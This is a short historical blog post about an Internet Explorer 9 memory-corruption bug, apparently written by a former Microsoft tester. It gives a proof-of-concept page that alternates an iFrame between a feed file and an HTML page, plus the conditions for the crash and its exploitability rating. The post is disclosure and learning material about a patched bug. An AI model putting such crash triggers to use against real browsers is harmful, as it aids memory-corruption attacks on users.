IE9 EoP: Iterating an iFrame URL Between Feeds and HTML

This one took me by surprise. Rapidly alternating an iFrame between an RSS/Atom feed URL and a regular HTML page caused an exploitable crash after just a few iterations. The key insight was combining a “hard-set” navigation (direct location assignment) with a “soft-set” navigation (window.open targeting the iFrame name).

<iframe name="iFrame" width="300" height="50" border="1"></iframe>
<input type="button" onclick="setInterval('main()', 100);" value="setInterval('main()', 100); // CrashMe!">

<script language="JavaScript">
function main()
{
    if (flag = !window.flag)
        iFrame.location = "feeds.xml";
    else
        window.open("dummy.html", "iFrame");
}
</script>

An important detail: the XML file needs to be a valid feeds document, and the HTML file must contain an alert with an object inside — the alert itself never actually fires, but its presence inside the feed-rendered object is what triggers the problematic code path. The crash lands in OLEAUT32!VariantClear trying to clear a vtable pointer that has been corrupted by the feed/HTML context switch. !msec.exploitable rated this EXPLOITABLE.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9: setCapture Through Tabs Enables UI Spoofing] :: [IE9 EoP: iFrame innerHTML Self-Destruction] >